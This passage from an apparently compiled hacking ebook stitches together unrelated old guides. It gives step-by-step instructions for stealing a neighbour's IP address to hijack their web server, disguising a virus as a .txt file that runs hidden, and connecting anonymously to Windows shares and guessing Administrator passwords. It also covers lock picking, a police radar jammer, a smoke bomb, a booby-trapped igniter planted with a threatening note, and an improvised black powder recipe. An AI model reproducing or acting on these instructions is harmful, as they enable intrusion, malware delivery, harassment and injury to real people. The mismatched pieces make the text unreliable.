1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".
2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this: Windows IP Configuration: Host Name . . . . . . . . . . . . . . : My Computer Name Here Primary Dns Suffix . . . . . . . . . : Node Type . . . . . . . . . . . . . . .: Unknown IP Routing Enabled. . . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI) Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . . . . . . : Yes IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0 Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx 24.xx.xxx.xx 24.xx.xxx.xxx Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM
This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.
III. Changing your IP Address
To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is
Mail:mtahirzahid@yahoo.com
Page 117
Power Of Hacking usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.
IV. DDoS & DoS Protection
If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.
V. Web servers & Other Services
If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself. To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get pissed ;)
Making A .txt Executable Server As you know a file name .EXE is a Executable file and can run a code. this guide will teach you how to make a .TXT Executable that can run any code you want..
STEP1
download TXT Icon pack: http://planet.nana.co.il/progroup/icon_txt.zip The pack comes with a 32bit & 16bit icons.
Mail:mtahirzahid@yahoo.com
Page 118
Power Of Hacking STEP2
Open a new file, Right click - New - Shortcut Type the location of the item: "X:\WINDOWS\system32\cmd.exe /c file.txt" ("X"=Driver) img /http://planet.nana.co.il/progroup/pictures/step1_g2.JPG and name it "readme.txt" img /http://planet.nana.co.il/progroup/pictures/step2_g2.JPG STEP3
after creating the readme.txt file right click on it and choose - Properties in the - "Start in" fill - "%currentdir%" , in the - "Run" choose - "Minimized". img /http://planet.nana.co.il/progroup/pictures/step3_g2.JPG
then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then - Properties - Change Icon...
STEP4: In order to execute a file you need one.. just change your Server/Virus extantion to .TXT and name it - "file.txt"
Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command - "C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.
STEP5: Now the readme.txt executes a command window, in order to hide it Right click on the "readme.txt" and choose - Properties - Layout and reduced the size on the window to height=1 and width=1. Now change the window position to height=999 and width=999. Mail:mtahirzahid@yahoo.com
Page 119
Power Of Hacking Now you got a .TXT Executable! you can try editing it and use some more tricks for hiding the shortcut arrow and more.. Manage Saved IE Passwords When you enter a user name and password, Internet Explorer may ask if you want it to remember the password. Click on Yes and it will automatically fill in the password next time you enter that user name. But if you check Don't offer to remember any more passwords, then whether you click on Yes or No, you won't be prompted again. To recover this feature, launch Internet Options from IE's Tools menu, select the Content tab, click on the AutoComplete button, and check Prompt me to save passwords.To delete an individual saved password entry, go to the log-on box on a Web page and double-click. Your saved AutoComplete entries will drop down. Use the arrow keys to scroll to the one you want to delete, and press the Del key.
How to Install NetBIOS You might have to make changes on your system in order to use these commands. Here's how to enable NetBIOS for Windows XP. (If you are stuck with Windows 95, 98, SE or ME, see the end of this Guide for how to enable NetBIOS.) Click:Control Panel -> Network Connections There are two types of network connections that may appear here: "Dial-up" and "LAN or High-Speed Internet". ************** Newbie note: A dial-up connection uses a modem to reach the Internet. LAN stands for local area network. It's what you have if two or more computers are linked to each other with a cable instead of modems. Most schools and businesses have LANs, as well as homes with Internet connection sharing. A DSL or cable modem connection will also typically show up as a LAN connection. ************** To configure your connections for hacking, double click on the connection you plan to use. That brings up a box that has a button labeled "Properties". Clicking it brings up a box that says "This connection uses the following items:" You need to have both TCP/IP and NWLink NetBIOS showing. If NWLink NetBIOS is missing, here's how to add it. Click Install -> Protocol -> Add NWlink/IPX/SPX/NetBIOS Compatible Transport Protocol. ************** Newbie note: NWLink refers to Novell's Netware protocol for running a LAN. **************
How to Use Nbtstat To get started, bring up the cmd.exe command. Click Start -> Run and type cmd.exe in the command line box. This brings up a black screen with white letters. Once it is up, we will play with the nbtstat command. To get help for this command, just type: C:\>nbtstat help One way to use the nbtstat command is to try to get information from another computer using either its domain name (for example test.target.com), its numerical Internet address (for example, happyhacker.org's numerical address is 206.61.52.30), or its NetBIOS name (if you Mail:mtahirzahid@yahoo.com
Page 120
Power Of Hacking are on the same LAN). C:\>nbtstat -a 10.0.0.2 Local Area Connection: Node IpAddress: [10.0.0.1] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------OLDGUY <00> UNIQUE Registered OLDGUY <20> UNIQUE Registered WARGAME <00> GROUP Registered INet~Services <1C> GROUP Registered IS~OLDGUY......<00> UNIQUE Registered OLDGUY <03> UNIQUE Registered WARGAME <1E> GROUP Registered ADMINISTRATOR <03> UNIQUE Registered MAC Address = 52-54-00-E4-6F-40 What do these things tell us about this computer? Following is a table explaining the codes you may see with an nbtstat command (taken from the MH Desk Reference, written by the Rhino9 team). Name Number Type Usage ========================================================= <computername> 00 U Workstation Service <computername> 01 U Messenger Service <\\_MSBROWSE_> 01 G Master Browser <compname> 03 U Messenger Service <computername> 06 U RAS Server Service <computername> 1F U NetDDE Service <computername> 20 U File Server Service <computername> 21 U RAS Client Service <computername> 22 U Exchange Interchange <computername> 23 U Exchange Store <computername> 24 U Exchange Directory <computername> 30 U Modem Sharing Server Service <computername> 31 U Modem Sharing Client Service <computername> 43 U SMS Client Remote Control <computername> 44 U SMS Admin Remote Control Tool <computername> 45 U SMS Client Remote Chat <computername> 46 U SMS Client Remote Transfer <computername> 4C U DEC Pathworks TCPIP Service <computername> 52 U DEC Pathworks TCPIP Service <computername> 87 U Exchange MTA <computername> 6A U Exchange IMC <computername> BE U Network Monitor Agent <computername> BF U Network Monitor Apps <username> 03 U Messenger Service <domain> 00 G Domain Name <domain> 1B U Domain Master Browser Mail:mtahirzahid@yahoo.com
Page 121
Power Of Hacking <domain> 1C G Domain Controllers <domain> 1D U Master Browser <domain> 1E G Browser Service Elections <INet~Services>1C G Internet Information Server <IS~Computer_name>00 U Internet Information Server To keep this Guide from being ridiculously long, we'll just explain a few of the things what we learned when we ran nbtstat -a against 10.0.0.2: * it uses NetBIOS * its NetBIOS name is Oldguy * one of the users is named Administrator * it runs a web site with Internet Information Server, and maybe an ftp - file transfer protocol -- server * it is a member of the domain Wargame * it is connected on a local area network and we accessed it through an Ethernet network interface card (NIC) with a MAC Address of 52-54-00-E4-6F-40. When using nbtstat over the Internet, in most cases it will not find the correct MAC address. However, sometimes you get lucky. That is part of the thrill of legal hacker exploration. OK, OK, maybe getting a thrill out of a MAC address means I'm some kind of a freak. But if you are reading this, you probably are freaky enough to be a hacker, too. ************** Newbie note: MAC stands for media access control. In theory every NIC ever made has a unique MAC address, one that no other NIC has. In practice, however, some manufacturers make NICs that allow you to change the MAC address. ************** ************** Evil Genius tip: sneak your computer onto a LAN and use it to find the MAC address of a very interesting computer. Crash it, then give yours the same MAC, NetBIOS name and Internet address as the very interesting computer. Then see what you can do while faking being that computer. That's why I get a charge out of discovering a MAC address, so stop laughing at me already. ************** ************** You can get fired, expelled, busted and catch cooties warning: Faking all that stuff is something you would be better off doing only on your own test network, or with written permission from the owner of the very interesting computer. ************** Now that we know some basic things about computer 10.0.0.2, also known as Oldguy, we can do some simple things to learn more. We can connect to it with a web browser to see what's on the web site, and with ftp to see if it allows anonymous users to download or upload files. In the case of Oldguy, anyone can browse the web site. However, when we try to connect to its ftp server with Netscape by giving the location ftp://10.0.0.2, it returns the message "User Mozilla@ cannot log in. ************** Newbie note: The people who programmed Netscape have always called it Mozilla, after a famous old movie monster. As a joke they have stuck obscure mentions of Mozilla into the operations of Netscape. Mozilla lovers recently spun off a pure Mozilla browser project that has the web site http://www.mozilla.org. Mail:mtahirzahid@yahoo.com
Page 122
Power Of Hacking **************
The Net View Command Now let's have some serious fun. Netscape (or any browser or ftp program) uses TCP/IP to connect. What happens if we use NetBIOS instead to try to download files from Oldguy's ftp server? Let's try some more NetBIOS commands: C:\>net view \\10.0.0.2 System error 53 has occurred. The network path was not found. I got this message because my firewall blocked access to Oldguy, giving the message: The firewall has blocked Internet access to 10.0.0.2 (TCP Port 445) from your computer [TCP Flags: S]. There's a good reason for this. My firewall/IDS is trying to keep me from carelessly making my computer a part of some stranger's LAN. Keep in mind that NetBIOS is a two-way street. However, I want to run this command, so I shut down Zone Alarm and give the command again: C:\>net view \\10.0.0.2 Shared resources at \\10.0.0.2 Share name Type Used as Comment -------------------------------------------------------ftproot Disk InetPub Disk wwwroot Disk The command completed successfully. This is a list of shared directories. Oooh, look at that, the ftp server is shared. Does this mean I can get in? When setting shares on a Windows NT server, the default choice is to allow access to read, write and delete files to everyone. So sometimes a sysadmin carelessly fails to restrict access to a share. What is really important is that we didn't need a user name or password to get this potentially compromising information. Let's establish an anonymous connection to Oldguy, meaning we connect without giving it a user name or password: C:\>net use \\10.0.0.2\ipc$ Local name Remote name \\10.0.0.2\IPC$ Resource type IPC Status OK # Opens 0 # Connections 1 The command completed successfully. We are connected! ********************** Newbie note: IPC (ipc$) stands for "Inter Process Connector", used to set up connections Mail:mtahirzahid@yahoo.com
Page 123
Power Of Hacking across a network between Windows computers using NetBIOS. **********************
What to Do Once you Are Connected So far we haven't quite been breaking the law, although we have been getting pretty rude if the owner of that target computer hasn't given us permission to explore. What if we want to stop pushing our luck and decide to disconnect? Just give the message: C:\>net session \\10.0.0.2 /delete Of course you would substitute the name or number of the computer to which you are connected for 10.0.0.2. What if you want to stay connected? Oldguy will let you stay connected even if you do nothing more. By contrast, a login to a Unix/Linux type computer will normally time out and disconnect you if you go too long without doing anything.
How to Break in Using the XP GUI You could try out the other net commands on Oldguy. Or you can go to the graphical user interface (GUI) of XP. After running the above commands I click My Computer, then My Network Places and there you'll find the victim, er, I mean, target computer. By clicking on it, I discover that ftproot has been shared to - everyone! Let's say you were to get this far investigating some random computer you found on the Internet. Let's say you had already determined that the ftp server isn't open to the public. At this moment you would have a little angel sitting one shoulder whispering "You can be a hero. Email the owner of that computer to tell him or her about that misconfigured ftproot." On the other shoulder a little devil is sneering, "Show the luser no mercy. Information should be free. Because I said so, that's why. Hot darn, are those spreadsheets from the accounting department? You could make a lot of bucks selling those files to a competitor, muhahaha! Besides, you're so ugly that future cellmate Spike won't make you be his girlfriend." Some hackers might think that because ftproot is shared to the world that it is OK to download stuff from it. However, if someone were to log in properly to that ftp server, he or she would get the message "Welcome to Oldguy on Carolyn Meinel's LAN. Use is restricted to only those for whom Meinel has assigned a user name and password." This warning logon banner is all a computer owner needs to legally establish that no one is allowed to just break in. It won't impress a judge if a cracker says "The owner was so lame that her computer deserved to get broken into" or "I'm so lame that I forgot to try to use the ftp server the normal way."
More on the Net Commands Let's get back to the net commands. There are many forms of this command. In XP you can learn about them with the command: C:\>net help The syntax of this command is: NET HELP command -orNET command /HELP Mail:mtahirzahid@yahoo.com
Page 124
Power Of Hacking Commands available are:
NET ACCOUNTS
NET HELP
NET SHARE NET COMPUTER
NET HELPMSG
NET START
NET CONFIG
NET LOCALGROUP
NET STATISTICS
NET CONFIG SERVER
NET NAME
NET STOP
NET CONFIG WORKSTATION
NET PAUSE
NET TIME
NET CONTINUE
NET PRINT
NET USE
NET FILE
NET SEND
NET USER
NET GROUP
NET SESSION
NET VIEW
NET HELP SERVICES lists some of the services you can start.
NET HELP SYNTAX explains how to read NET HELP syntax lines.
NET HELP command | MORE displays Help one screen at a time.
How Crackers Break in as Administrator As we look around Oldguy further, we see that there's not much else an anonymous user can do to it. We know that there is a user named Administrator. What can we do if we can convince Oldguy that we are Administrator? ****************** Newbie note: in Windows NT, 2000 and XP, the Administrator user has total power over its computer, just as root has total power over a Unix/Linux type computer. However, it is possible to change the name of Administrator so an attacker has to guess which user has all the power. Mail:mtahirzahid@yahoo.com
Page 125
Power Of Hacking ****************** Let's try to log in as Administrator by guessing the password. Give the command: C:\>net use \\10.0.0.2\ipc$ * /user:Administrator Type the password for \\10.0.0.2\ipc$: System error 1219 has occurred. Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again. This means that someone else is currently logged onto this server who has Administrator rights. Furthermore, this person is probably watching me on an IDS and thinking up terrible things to do to me. Eeep! Actually this is all going on inside my hacker lab - but you get the idea of what it could be like when trying to invade a computer without permission. I discover that whether I guess the password correctly or not, I always get the same error message. This is a good safety feature. On the other hand, one of the users is named Administrator. This is a bad thing for the defender. When you first set up a Windows NT or 2000 server, there is always a user called Administrator, and he or she has total power over that computer. If you know the all-powerful user is named Administrator, you can try guessing the password whenever no one is logged on with Administrator powers. Computer criminals don't waste time guessing by hand. They use a program such as NAT or Legion to get passwords. These programs are why smart NT administrators rename their Administrator accounts and choose hard passwords. Also, this kind of persistent attack will be detected by an intrusion detection system, making it easy to catch criminals at work. ******************** You can get expelled warning: What if you are a student and you want to save your school from malicious code kiddies who steal tests and change grades? It is important to get permission *in writing* before you test the school's network. Even then, you still must be careful to be a model student. If you act up, cut classes - you know what I mean - the first time a cracker messes up the network, who do you think they will suspect? Yes, it's unfair, and yes, that is the way the world works. ********************
How to Scan for Computers that Use NetBIOS Your tool of choice is a port scanner. Any computer that is running something on port 139 is likely (but not certain) to be using NetBIOS. Most crackers use nmap to port scan. This tool runs on Unix/Linux type computers. You can get it at <http://www.insecurity.org/>. There is also a Windows version of nmap, but it isn't very good. A better choice for Windows is Whats Up from <http://www.ipswitch.com/>. You can get a one month free trial of it. Here's an example of an nmap scan of Oldguy: test-box:/home/cmeinel # nmap -sTU 10.0.0.2 Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Interesting ports on (10.0.0.2): (The 3060 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 70/tcp open gopher 80/tcp open http Mail:mtahirzahid@yahoo.com
Page 126
Power Of Hacking 135/tcp open loc-srv 135/udp open loc-srv 137/udp open netbios-ns 138/udp open netbios-dgm 139/tcp open netbios-ssn 500/udp open isakmp Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds As you can see from this scan, three ports are identified with NetBIOS. This tells us that we could set nmap to scan a large number of Internet addresses, only looking for port 139 on each. To learn how to set up nmap to run this way, in your Unix or Linux shell give the command "man nmap". For more on what crackers do once they break into a computer using NetBIOS (like installing back doors), see http://happyhacker.org/gtmhh/vol3no10.shtml <vol3no10.shtml>. ******************** You can get punched in the nose warning: if you use a port scanner against networks that haven't given you permission to scan, you will be waving a red flag that says "Whaddaya wanna bet I'm a computer criminal?" You can't get arrested for merely port scanning, but people who don't like being scanned might get you kicked off your Internet service provider. You can get really, big time, punched in the nose warning: If you visit the same computer or LAN really often to see what's new and to try different things, even if you don't break the law you'd better be doing it with the permission of the owner. Otherwise you may make enemies who might crash or destroy your operating system. And that is only what they may do when feeling mellow. After a night of hard drinking - well, you don't want to find out. ********************
How to Play NetBIOS Wargames What if you want to challenge your friends to a hacker wargame using NetBIOS? The first thing to do is *don't* email me asking me to break in for you. Sheesh. Seriously, almost every day I get emails from people claiming to have permission from their girlfriend/boyfriend and begging me to help them break in. You can read their hilarious pleas for help at http://happyhacker.org/sucks/ <../sucks/index.shtml> . The way to run a hacker wargame over the Internet is first, get permission from your Internet provider so they don't kick you off for hacking. They probably run an IDS that scans users for suspicious activity. They probably hate malicious hackers. Enough said. Second, you and your friends are likely to be at a different Internet address every time you log on. Your safest way to play over the Internet is for each player to get an Internet address that is the same every time he or she logs on: a "static" address. This way you won't accidentally break into someone else's computer. You have to arrange with your Internet provider to get a static address. Normally only a local provider can do this for you. A big advantage of using a local provider is you can make friends with the people who work there - and they are probably hackers. If you live in an apartment building or dormitory with other hackers, you can play break-in games without using the Internet. Set up a LAN where you can play together. For example, you can string Ethernet cable from window to window. To learn how to set up a Windows Ethernet LAN, see http://happyhacker.org/gtmhh/winlan.shtml . Or you could set up a wireless LAN. With wireless you never know who might come cruising Mail:mtahirzahid@yahoo.com
Page 127
Power Of Hacking with a laptop down the street by your home or business and break in. That can make a wargame lots more fun. For help on how to break into wireless LANs (it's pathetically easy), see <http://www.wardriving.com/>. **************
Evil genius tip: Attack using a Win NT server with the Microsoft Resource Kit installed. Heh, heh. With it you can give the command: C:\>Local Administrators \\<targetbox.com> This should show all user accounts with administrator rights on targetbox.com. C:\>Global Administrators \\<targetbox.com > This should show all user accounts with Domain administrative rights. These are exceptionally worth compromising, because with one Domain administrative password you will be able to control many resources among NT servers, workstations, and Win 95/98 computers. I've tried to install the Resource Kit on XP Professional, but it wasn't compatible. Another option is to install hacker tools such as Red Button and DumpACL, which extract information on user names, hashes, and which services are running on a given machine. **************
Help for users of Windows 95, 98, SE or ME To enable NetBIOS, click Control Panel -> Network -> Protocols If you see both NetBEUI and TCP/IP, you are already using NetBIOS. If not, add NetBEUI. To bring up the command screen, click Start -> Run and type in command.com. Optimize Broadband & Dsl Connections These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP. Open your registry and find the key below. Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on 'Edit -> New -> DWORD Value' and then set the value as shown below. DefaultTTL = "80" hex (or 128 decimal) Specifies the default time to live (TTL) for TCP/IP packets. The default is 32. EnablePMTUBHDetect = "0" Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0. EnablePMTUDiscovery = "1"
Mail:mtahirzahid@yahoo.com
Page 128
Power Of Hacking Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1. GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the system maximum receive window size advertised by the TCP/IP stack. TcpMaxDupAcks = "2" Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered. SackOpts = "1" Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0. Tcp1323Opts = "1" Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled. TcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300. Exit your registry and restart Windows for the changes to take effect.If you donâ&#x20AC;&#x2122;t want to edit the registry, here's a little TCP utility that is ideal...http://www.broadbandreports.com/front/doctorping.zip Picking Master Locks l Have you ever tried to impress someone by picking one of those Master combination locks and failed? The Master lock company made their older combination locks with a protection scheme. If you pull the handle too hard, the knob will not turn. That was their biggest mistake. The first number: Get out any of the Master locks so you know what is going on. While pulling on the clasp (part that springs open when you get the combination right), turn the knob to the left until it will not move any more, and add five to the number you reach. You now have the first number of the combination. The second number: Mail:mtahirzahid@yahoo.com
Page 129
Power Of Hacking Spin the dial around a couple of times, then go to the first number you got. Turn the dial to the right, bypassing the first number once. When you have bypassed the first number, start pulling on the clasp and turning the knob. The knob will eventually fall into the groove and lock. While in the groove, pull the clasp and turn the knob. If the knob is loose, go to the next groove, if the knob is stiff, you have the second number of the combination. The third number: After getting the second number, spin the dial, then enter the two numbers. Slowly spin the dial to the right, and at each number, pull on the clasp. The lock will eventually open if you did the process right. This method of opening Master locks only works on older models. Someone informed Master of their mistake, and they employed a new mechanism that is foolproof (for now). The older models are from 1988-1990. The newer models are being cracked on as we speak.. The Arts of Lockpicking ll
So you want to be a criminal. Well, if you want to be like James Bond and open a lock in fifteen seconds, then go to Hollywood, because that is the only place you are ever going to do it. Even experienced locksmiths can spend five to ten minutes on a lock if they are unlucky. If you are wanting extremely quick access, look elsewhere. The following instructions will pertain mostly to the "lock in knob" type lock, since it is the easiest to pick.
Mail:mtahirzahid@yahoo.com
Page 130
Power Of Hacking First of all, you need a pick set. If you know a locksmith, get him to make you a set. This will be the best possible set for you to use. If you find a locksmith unwilling to supply a set, don't give up hope. It is possible to make your own, if you have access to a grinder (you can use a file, but it takes forever). The thing you need is an allen wrench set (very small). These should be small enough to fit into the keyhole slot. Now, bend the long end of the allen wrench at a slight angle (not 90 degrees). Now, take your pick to a grinder or a file, and smooth the end until it is rounded so it won't hang inside the lock. Test your tool out on doorknobs at your house to see if it will slide in and out smoothly. Now, this is where the screwdriver comes in. It must be small enough for it and your pick to be used in the same lock at the same time, one above the other. In the coming instructions, please refer to this chart of the interior of a lock: ______________________________ \K | | | | | | /E | ^
^
| | | \Y
[|] Upper tumbler pin
/H
[^] Lower tumbler pin
^ ^ ^ ^ ^ ^ \O
[-] Cylinder wall
/ L (This is a greatly simplified \ E drawing) ______________________________/
The object is to press the pin up so that the space between the
Mail:mtahirzahid@yahoo.com
Page 131
Power Of Hacking upper pin and the lower pin is level with the cylinder wall. Now, if you push a pin up, it's tendency is to fall back down, right? That is where the screwdriver comes in. Insert the screwdriver into the slot and turn. This tension will keep the "solved" pins from falling back down. Now, work from the back of the lock to the front, and when you are through, there will be a click, the screwdriver will turn freely, and the door will open.
Do not get discouraged on your first try! It will probably take you about twenty to thirty minutes your first time. After that, you will quickly improve with practice. Highway radar jamming Most drivers wanting to make better time on the open road will invest in one of those expensive radar detectors. However, this device will not work against a gun type radar unit in which the radar signal is not present until the cop has your car in his sights and pulls the trigger. Then it is TOO LATE for you to slow down. A better method is to continuously jam any signal with a radar signal of your own. I have tested this idea with the cooperation of a local cop and found that his unit reads random numbers when my car approached him. It is suprisingly easy to make a low power radar transmitter. A nifty little semiconductor called a Gunn Diode will generate microwaves when supplied with the 5 to 10 volt DC and enclosed in the correct size cavity (resonater). An 8 to 3 terminal regulator can be used to get this voltage from a car's 12v system. However, the correct construction and tuning of the cavity is difficult without good microwave measurement
Mail:mtahirzahid@yahoo.com
Page 132
Power Of Hacking equipment. Police radars commonly operate on the K band at 22 ghz. Or more often on the X band at 10.525 ghz. most microwave intruder alarms and motion detectors (mounted over automatic doors in supermarkets & banks, etc.) contain a Gunn type transmitter/receiver combination that transmits about 10 kilowatts at 10.525 ghz. These units work perfectly as jammers. If you cannot get one locally, write to Microwave Associates in Burlington, Massachusettes and ask them for info on 'Gunnplexers' for ham radio use. When you get the unit it may be mounted in a plastic box on the dash or in a weather-proff enclosure behind the PLASTIC grille. Switch on the power when on an open highway. The unit will not jam radar to the side or behind the car so don't go speeding past the radar trap. An interesting phenomena you will notice is that the drivers who are in front of you who are using detectors will hit their brakes as you approach large metal signs and bridges. Your signal is bouncing off of these objects and triggering their radar detectors!
HAVE FUN!
Smoke Bombs Here is the recipe for one helluva smoke bomb! 4 parts sugar 6 parts potassium nitrate (Salt Peter) Heat this mixture over a LOW flame until it melts, stirring well. Pour it into a future container and, before it solidifies, imbed a few matches into the mixture to use as fuses. One pound of this stuff will fill up a whole block with thick, white smoke! Electronic Terrorism It starts when a big, dumb lummox rudely insults you. Being of a Mail:mtahirzahid@yahoo.com
Page 133
Power Of Hacking rational, intelligent disposition, you wisely choose to avoid a (direct) confrontation. But as he laughs in your face, you smile inwardly---your revenge is already planned. Step 1: follow your victim to his locker, car, or house. Once you have chosen your target site, lay low for a week or more, letting your anger boil. Step 2: in the mean time, assemble your versatile terrorist kit(details below.) Step 3: plant your kit at the designated target site on a monday morning between the hours of 4:00 am and 6:00 am. Include a calm, suggestive note that quietly hints at the possibility of another attack. Do not write it by hand! An example of an effective note: "don't be such a jerk, or the next one will take off your hand. Have a nice day." Notice how the calm tone instills fear. As if written by a homicidal psychopath. Step 5: choose a strategic location overlooking the target site. Try to position yourself in such a way that you can see his facial contortions. Step 6: sit back and enjoy the fireworks! Assembly of the versatile, economic, and effective terrorist kit #1: the parts you'll need are: 1) 4 aa batteries 2) 1 9-volt battery 3) 1 spdt mini relay (radio shack) 4) 1 rocket engine(smoke bomb or m-80) 5) 1 solar ignitor (any hobby store) 6) 1 9-volt battery connector
Mail:mtahirzahid@yahoo.com
Page 134
Power Of Hacking Step 1: take the 9-volt battery and wire it through the relay's coil. This circuit should also include a pair of contacts that when separated cut off this circuit. These contacts should be held together by trapping them between the locker,mailbox, or car door. Once the door is opened, the contacts fall apart and the 9-volt circuit is broken, allowing the relay to fall to the closed postion thus closing the ignition circuit. (If all this is confusing take a look at the schematic below.) Step 2: take the 4 aa batteries and wire them in succession. Wire the positive terminal of one to the negative terminal of another, until all four are connected except one positive terminal and one negative terminal. Even though the four aa batteries only combine to create 6 volts, the increase in amperage is necessary to activate the solar ignitor quickly and effectively. Step 3: take the battery pack (made in step 2) and wire one end of it to the relay's single pole and the other end to one prong of the solar ignitor. Then wire the other prong of the solar ignitor back to the open position on the relay. Step 4: using double sided carpet tape mount the kit in his locker, mailbox, or car door. And last, insert the solar ignitor into the rocket engine (smoke bomb or m-80). Your kit is now complete!
---------><--------I (CONTACTS) I I
I
I
- (BATTERY)
Mail:mtahirzahid@yahoo.com
Page 135
Power Of Hacking I
---
I
I
I
(COIL)
I
------///////------/----------/
I
/
I
/
I
(SWITCH) I
I
I
I
I
--- (BATTERY)
I
- ( PACK )
I
---
I
I
I
I
---- ----II * (SOLAR IGNITOR) Improvised Black Powder Black powder can be prepared in a simple, safe manner. It may be used as blasting or gun powder. Material Required -----------------Potassium Nitrate, granulated, 3 cups (3/4 liter) Wood charcoal, powdered, 2 cups Sulfur, powdered, 1/2 cup Alcohol, 5 pints (2-1/2 liters) (whiskey, rubbing alcohol, etc.)
Mail:mtahirzahid@yahoo.com
Page 136
Power Of Hacking Water, 3 cups (3/4 liter) Heat source 2 buckets - each 2 gallon (7-1/2 litres) capacity, at least one of which is heat resistant (metal, ceramic, etc.) Flat window screening, at least 1 foot (30 cm) square Large wooden stick Cloth, at leat 2 feet (60 cm) square
Procedure: --------1) Place alcohol in one of the buckets. 2) Place potassium nitrate, charcoal, and sulfur in the heat resistant bucket. Add 1 cup water and mix thoroughly with wooden stick until all ingrediants are dissolved. 3) Add remaining water (2 cups) to mixture. Place bucket on heat source and stir until small bubbles begin to form.
CAUTION: DO NOT boil mixture. Be sure ALL mixture stays wet. If any is dry, as on sides of pan, it may ignite! 4) Remove bucket from heat and pour mixture into alcohol while stirring vigorously. 5) Let alcohol mixture stand about 5 minutes. Strain mixture through cloth to obtain black powder. Discard liquid. Wrap cloth around black powder and squeeze to remove all excess liquid. 6) Place screening over dry bucket. Place workable amount of damp powder on screen and granulate by rubbing solid through screen. NOTE: If granulated particles appear to stick together and change shape, recombine entire batch
Mail:mtahirzahid@yahoo.com
Page 137
Power Of Hacking of powder and repeat steps 5 & 6. 7) Spread granulated black powder on flat, dry surface so that layer about 1/2 inch (1-1/4 cm) is formed. Allow to dry. Use radiator, or direct sunlight. This should be dried as soon as possible, preferably in an hour. The longer the drying period, the less effective the black powder. CAUTION: Remove from heat AS SOON AS granules are dry. Black powder isnow ready to use. pucking with the Operator
Ever get an operator who gave you a hard time, and you didn't know what to do? Well if the operator hears you use a little Bell jargon, she might wise up. Here is a little diagram (excuse the artwork) of the structure of operators
/--------\
/------\
/-----\
!Operator!-- > ! S.A. ! --->! BOS ! \--------/
\------/
\-----/
! ! V /-------------\ ! Group Chief ! \-------------/
Now most of the operators are not bugged, so they can curse at you, if they do ask INSTANTLY for the "S.A." or the Service Assistant. The operator does not report to her (95% of them are hers) but they will solve most of your problems.
Mail:mtahirzahid@yahoo.com
Page 138
